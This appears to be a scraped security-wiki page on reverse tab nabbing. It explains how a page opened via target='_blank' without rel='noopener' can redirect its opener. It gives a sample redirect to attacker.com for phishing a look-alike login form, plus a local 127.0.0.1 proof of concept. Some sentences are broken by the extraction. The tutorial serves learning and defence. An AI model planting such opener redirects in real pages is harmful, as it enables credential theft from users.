Comment on page
Reverse Tab Nabbing
In a situation where an attacker can control the
hrefargument of an
<atag with the attribute
window.opener. If the page doesn't have
target="_blank"it also doesn't have
rel="noopener"it might be also vulnerable.
A regular way to abuse this behaviour would be to change the location of the original web via
window.opener.location = https://attacker.com/victim.htmlto a web controlled by the attacker that looks like the original one, so it can imitate the login form of the original website and ask for credentials to the user.
Link between parent and child pages when prevention attribute is not used:
Link between parent and child pages when prevention attribute is used:
Create the following pages in a folder and run a web server with
python3 -m http.serverThen, access
http://127.0.0.1:8000/vulnerable.html, click on the link and note how the original website URL changes.
<a href="http://127.0.0.1:8000/malicious.html" target="_blank" rel="opener">Controlled by the attacker</a>
window.opener.location = "http://127.0.0.1:8000/malicious_redir.html";
<h1>New Malicious Site</h1>
opener.closed: Returns a boolean value indicating whether a window has been closed or not.
opener.frames: Returns all iframe elements in the current window.
opener.length: Returns the number of iframe elements in the current window.
opener.opener: Returns a reference to the window that created the window.
opener.parent: Returns the parent window of the current window.
opener.self: Returns the current window.
opener.top: Returns the topmost browser window.